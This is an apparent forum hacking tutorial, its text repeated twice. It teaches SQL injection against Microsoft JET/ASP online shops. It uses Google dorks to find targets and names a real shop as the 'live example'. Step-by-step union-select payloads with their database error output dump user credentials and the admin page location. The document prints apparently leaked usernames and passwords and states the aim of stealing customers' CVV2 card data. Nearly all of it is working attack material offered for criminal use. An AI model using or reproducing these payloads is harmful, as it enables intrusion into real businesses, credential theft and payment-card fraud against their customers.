1.Microsoft JET Database Engine Hacking(with live example shop)
.Open your web browser.Use mozilla firefox to hack shops.This will show errors in shops.Don't use microsoft explore because you will not see error in shops.
.Google will help us find shops to hack.If you have any url link extractor like GURLE is good too.But for starters open www.google.com
.Now we use dorks or bugs as you may call it to search for shops(example shop.asp?id=)Type "allinurl:shopdisplayproducts.asp?id=" in www.google.com and search.You will see many shops which ends in numbers.(example http://shopping.ethnix.co.za/shopdis...ducts.asp?id=3)We use this shop as an example to hack.
.Now open the shop in new tab
.We check the shop if it's hackable.We do that by adding ' or '' to the last number at the url link and press enter.It will be as follows
http://shopping.ethnix.co.za/shopdisplayproducts.asp?id=3'
(you will see a error on the screen page which means the shops is hackable)
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 3' and hide=0 order by specialoffer desc,cname'.
/shop$db.asp, line 325
.Since the shop is hackable, we find the username and the password.We do it by removing the ' after 3 and replacing it with this code %20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%20fro m%20tbluser%27
it will be like this in the url link
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100%20from%20tbluser%27
what do you see on screenpage?You will see this
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 325
this means that the number of columns in the queries do match.We need to reduce the numbers in the columns one after the other till we find a page with pictures.
.Now we reduce the numbers by deleting ,100 from the culumns.
It will be like this
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99%20from%20tbluser%27
what do you see on screenpage?You will see this
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 325
this means that still the numbers in the columns donot match.We still need to reduce the numbers.
.Now we delete ,99 from the number of column of numbers.
It will be like this
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98%20from%20tbluser%27
what do you see on screenpage?You will see this
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 325
Still the numbers donot match.We need to reduce the numbers untill we see a page with a picture.
.Now let assume we reduce the numbers to 43.
it will be like this
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43%20from%20tbluser%27
what do you see on screenpage?You will see this.You will see a page with numbers on screen.
.Now we get the username and password by replacing "fldusername%2b'%20//%20'%2bfldPassword" with 3 in the number of columns.(NB: we do that because the image of 3 is not showing which means it has the username and password.)
it will be like this
http://shopping.ethnix.co.za/shopdi...1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20tbluser%27
what do you see on screenpage?You will see this diffirent usernames and passwords
admin // webspinner
Jose // madrid
mikka // zatanaz
.Hurray we hacked the username and password.
.We need to enter the admin home page to get all cvv2 from shop.
.We hacked the admin link by this code
%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43%20from%20configuration%27
(NB:note that the numbers in coulums had been reduce to 43 since that we got a page with pictures)
.Now we replace number 3 in the columns with "fieldname%2b%27/%27%2bfieldvalue"
so it will be like this
http://shopping.ethnix.co.za/shopdi...11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20configuration%27
what do you see on screenpage?You will see this
affallowaffiliatesrevieworders/No
affcommissionincludesallorders/No
xadminpage/shopadmin.asp
.Now we hacked the admin link.
http://shopping.ethnix.co.za/shopadmin.asp
we enter username and password to get cvv2.
END OF CLASS
IF YOU DON'T UNDERSTAND CONTACT ME .
dont forget to say thanks
.Open your web browser.Use mozilla firefox to hack shops.This will show errors in shops.Don't use microsoft explore because you will not see error in shops.
.Google will help us find shops to hack.If you have any url link extractor like GURLE is good too.But for starters open www.google.com
.Now we use dorks or bugs as you may call it to search for shops(example shop.asp?id=)Type "allinurl:shopdisplayproducts.asp?id=" in www.google.com and search.You will see many shops which ends in numbers.(example http://shopping.ethnix.co.za/shopdis...ducts.asp?id=3)We use this shop as an example to hack.
.Now open the shop in new tab
.We check the shop if it's hackable.We do that by adding ' or '' to the last number at the url link and press enter.It will be as follows
http://shopping.ethnix.co.za/shopdisplayproducts.asp?id=3'
(you will see a error on the screen page which means the shops is hackable)
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid and cc.intcategoryid = 3' and hide=0 order by specialoffer desc,cname'.
/shop$db.asp, line 325
.Since the shop is hackable, we find the username and the password.We do it by removing the ' after 3 and replacing it with this code %20union%20%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,7 6,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100%20fro m%20tbluser%27
it will be like this in the url link
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99,100%20from%20tbluser%27
what do you see on screenpage?You will see this
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 325
this means that the number of columns in the queries do match.We need to reduce the numbers in the columns one after the other till we find a page with pictures.
.Now we reduce the numbers by deleting ,100 from the culumns.
It will be like this
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98,99%20from%20tbluser%27
what do you see on screenpage?You will see this
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 325
this means that still the numbers in the columns donot match.We still need to reduce the numbers.
.Now we delete ,99 from the number of column of numbers.
It will be like this
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66, 67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93 ,94,95,96,97,98%20from%20tbluser%27
what do you see on screenpage?You will see this
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
/shop$db.asp, line 325
Still the numbers donot match.We need to reduce the numbers untill we see a page with a picture.
.Now let assume we reduce the numbers to 43.
it will be like this
http://shopping.ethnix.co.za/shopdi...3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43%20from%20tbluser%27
what do you see on screenpage?You will see this.You will see a page with numbers on screen.
.Now we get the username and password by replacing "fldusername%2b'%20//%20'%2bfldPassword" with 3 in the number of columns.(NB: we do that because the image of 3 is not showing which means it has the username and password.)
it will be like this
http://shopping.ethnix.co.za/shopdi...1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20tbluser%27
what do you see on screenpage?You will see this diffirent usernames and passwords
admin // webspinner
Jose // madrid
mikka // zatanaz
.Hurray we hacked the username and password.
.We need to enter the admin home page to get all cvv2 from shop.
.We hacked the admin link by this code
%20union%20%20select% 201,2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43%20from%20configuration%27
(NB:note that the numbers in coulums had been reduce to 43 since that we got a page with pictures)
.Now we replace number 3 in the columns with "fieldname%2b%27/%27%2bfieldvalue"
so it will be like this
http://shopping.ethnix.co.za/shopdi...11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20configuration%27
what do you see on screenpage?You will see this
affallowaffiliatesrevieworders/No
affcommissionincludesallorders/No
xadminpage/shopadmin.asp
.Now we hacked the admin link.
http://shopping.ethnix.co.za/shopadmin.asp
we enter username and password to get cvv2.
END OF CLASS
IF YOU DON'T UNDERSTAND CONTACT ME .
dont forget to say thanks
